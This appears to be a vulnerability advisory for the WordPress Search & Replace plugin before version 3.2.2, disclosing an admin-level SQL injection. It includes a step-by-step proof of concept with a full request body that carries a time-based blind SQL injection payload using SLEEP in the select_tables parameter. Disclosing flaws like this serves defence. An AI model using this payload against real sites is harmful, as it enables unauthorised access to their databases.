Search & Replace < 3.2.2 - Admin+ SQL injection

Description The plugin does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks (such as within a multi-site network).

PoC

1. Go to the Tools parameter 2. Select Search & Replace 3. Click “Do Search & Replace” 4. Change the parameters and intercept the request 5. Put a vulnerable SQL query in the request, such as the following: search=123&replace;=1&csv;=1&select;_tables%5B%5D=(SELECT+9255+FROM+(SELECT(SLEEP(1-(IF(44=44,0,5)))))cCQl)&export;_or_save=1&action;=search-replace&search-submit;=123123"asdasd=''&insr;_nonce=0590310227&_wp_http_referer=%2Fwp-admin%2Ftools.php%3Fpage%3Dsearch-replace 6. Notice that the response takes double seconds of the SLEEP(x-) number you insert.